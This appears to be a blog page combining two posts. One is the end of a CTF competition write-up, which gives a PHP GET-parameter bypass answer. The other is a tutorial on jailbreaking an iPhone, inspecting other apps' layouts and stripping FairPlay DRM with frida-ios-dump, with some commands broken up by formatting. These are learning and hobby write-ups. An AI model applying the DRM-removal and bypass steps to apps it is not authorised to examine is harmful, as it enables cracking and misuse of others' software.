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
+
From the beginning, we can tell that this is a base64 compressed image. By pasting the above code directly into the browser’s address bar, we can get the URL where the answer is located. Enter the URL to pass the level!
4. Break through the blockade
Question Explanation: This question shows the PHP code of the question. You need to find a way to use GET parameters to bypass the judgment and execute the setPassedCookie( ); method in the else block.
Solution: This question involves a commonly used but lesser-known PHP vulnerability, detailed as follows:
Summary of Common PHP Vulnerabilities in CTF
The question has been slightly modified. The answer to this question is: ?m.id[]=admin
5. Penetration Test, 6. Penetration Test 2
These two questions are basic introductory XSS questions, so they won’t be elaborated here.
For this question, since the answer is placed on the front end, a website providing irreversible encryption in JS was used: https://www.sojson.com/jsobfuscator.html
(Although I’m not sure if it’s true? Anyway, if it can be cracked, just consider it passed!)
7. Moonlight Treasure Box
This question is taken from a puzzle app, so it won’t be displayed here.
The competition system took about a week to set up, and the questions took about three months to slowly gather (inspiration needed); the competition has successfully concluded, and the feedback received was quite good—”interesting and fun”; this was my original intention, hoping everyone would explore and brainstorm from an interesting starting point; therefore, whether it’s the question names (all very movie-like) or the question directions, there won’t be too deep engineering or calculation stuff, as that would be too rigid and uninteresting!
Additionally, here is the question response rate as a reference for difficulty:
When creating the questions, the biggest fear was that the questions would be too easy and everyone would solve them quickly, or too difficult and everyone would get stuck. Both situations are awkward.
The actual competition results (competition time: 90 minutes) met our expectations, just right! Not too hard or too easy, the first-place team solved 9 questions, and even the last-place team solved 7 questions; very close, but due to time scores and hint purchases, there was still a clear winner!
Surprisingly, no one solved the entrance to the magic academy… QQ
This concludes the summary of the engineering CTF competition.
Addcn 2019 CTF
For any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Exploring the process from jailbreaking, extracting iPA files, shelling, to UI analysis, injection, and decompilation
The only thing I did related to security before was « Using Man-in-the-Middle Attack to Sniff Transmission Data »; additionally, following this, suppose we encode and encrypt data before transmission and decrypt it within the APP upon receipt to prevent man-in-the-middle sniffing; is it still possible for the data to be stolen?
The answer is yes! Even if you haven’t actually tested it; there is no unbreakable system in the world, only the issue of time and cost. When the time and effort required to crack it exceed the benefits, it can be considered secure!
Having done all this, how can it still be broken? This is the topic I want to document in this article — “Reverse Engineering”, cracking open your APP to study how you do encryption and decryption. I’ve always been somewhat clueless about this field, only hearing two major talks at iPlayground 2019, where I roughly understood the principles and implementation. Recently, I had the chance to play around with it and share it with everyone!
macOS Version: 10.15.3 Catalina iOS Version: iPhone 6 (iOS 12.4.4 / Jailbroken) *Required Cydia: Open SSH
Any version of iOS, iPhone can be used, as long as it is a jailbreakable device. It is recommended to use an old phone or a development device to avoid unnecessary risks. You can refer to Mr. Crazy’s Jailbreak Tutorial based on your phone and iOS version. If necessary, you may need to downgrade iOS (Certification Status Check) before jailbreaking.
I used an old iPhone 6 for testing. It was originally upgraded to iOS 12.4.5, but I found that 12.4.5 couldn’t be jailbroken successfully. So, I downgraded to 12.4.4 and used checkra1n to jailbreak successfully!
The steps are not many and not difficult; it just requires some waiting time!
A silly experience of mine: After downloading the old IPSW file, connect the phone to the Mac, use Finder (macOS 10.5 and later no longer have iTunes), select the phone under Locations on the left, and in the phone information screen, hold “Option” and then click “Restore iPhone” to bring up the IPSW file selection window. Choose the old IPSW file you just downloaded to complete the downgrade.
I foolishly clicked Restore iPhone directly… it only wasted time reinstalling the latest version…
Let’s start with something interesting, using tools and a jailbroken phone to see how others layout their APP.
Viewing tools: One is the veteran Reveal (more complete features, costs about $60 USD/can be tried), and the other is the free open-source tool lookin made by Tencent QMUI Team. Here, we use lookin as a demonstration; Reveal is similar.
If you don’t have a jailbroken phone, it’s okay. This tool is mainly for use in development projects to view Debug layouts (replacing Xcode’s basic inspector). It can also be used in regular development!
Only when you want to view someone else’s APP do you need a jailbroken phone.
You can choose to install using CocoaPods, Breakpoint Injection (only supports simulators), manually import the Framework into the project, or manual setup.
After building and running the project, you can select the APP screen in the Lookin tool -> view the layout structure.
Step 1. Open “ Cydia “ on the jailbroken phone -> search for “ LookinLoader “ -> “ Install “ -> go back to the phone “ Settings “ -> “ Lookin “ -> “ Enabled Applications “ -> enable the APP you want to view.
Step 2. Use a cable to connect the phone to the Mac computer -> open the APP you want to view -> go back to the computer, select the APP screen in the Lookin tool -> you can view the layout structure.
Facebook login screen layout structure
You can view the View Hierarchy in the left sidebar and dynamically modify the selected object in the right sidebar.
The original “Create New Account” was changed to “Hahaha” by me
Modifications to the object will also be displayed in real-time on the mobile APP, as shown above.
Just like the “F12” developer tools for web pages, all modifications are only effective for the View and will not affect the actual data; mainly used for Debugging, but you can also use it to change values, take screenshots, and then trick your friends XD.
Although Reveal requires a paid subscription, I personally prefer Reveal; it provides more detailed information on the structure, and the right information panel is almost equivalent to the XCode development environment, allowing for real-time adjustments. Additionally, it will prompt Constraint Errors, which is very helpful for UI layout corrections!
Both of these tools are very helpful in the daily development of your own APP!
After understanding the process environment and the interesting parts, let’s get to the main topic!
*The following requires a jailbroken phone
All APPs installed from the App Store have FairPlay DRM protection, commonly known as shell protection. Removing this protection is called “cracking,” so simply extracting the .ipa from the App Store is meaningless and unusable.
*Another tool, APP Configurator 2, can only extract protected files, which is meaningless, so it won’t be elaborated here. Those interested in using this tool can click here for a tutorial.
Regarding the tools, initially, I used Clutch, but no matter how I tried, it always showed FAILED. After checking the project’s issues, I found that many people had the same problem. It seems that this tool can no longer be used on iOS ≥ 12. There is also an old tool called dumpdecrypted, but I haven’t looked into it.
Here, I use frida-ios-dump, a Python tool for dynamic binary dumping, which is very convenient to use!
First, let’s prepare the environment on the Mac:
sudo pip install frida --upgrade --ignore-installed six
(Python 2.X) sudo pip3 install frida --upgrade --ignore-installed six
(Python 3.X)frida-ps
in Terminal. If there are no error messages, the installation was successful!Environment on the jailbroken phone:
Frida for pre-A12 devices
).Once the environment is set up, let’s get started:
Connect the phone to the computer using a USB cable.
Open a Terminal on the Mac and enter iproxy 2222 22
to start the server.
Ensure the phone/computer are on the same network (e.g., connected to the same WiFi).
Open another Terminal and enter ssh root@127.0.0.1
, then enter the SSH password (default is alpine
).
Enter dump.py -l
to list the installed/running apps on the phone.
dump.py APP_NAME_OR_BUNDLE_ID -o OUTPUT_PATH/OUTPUT_FILENAME.ipa
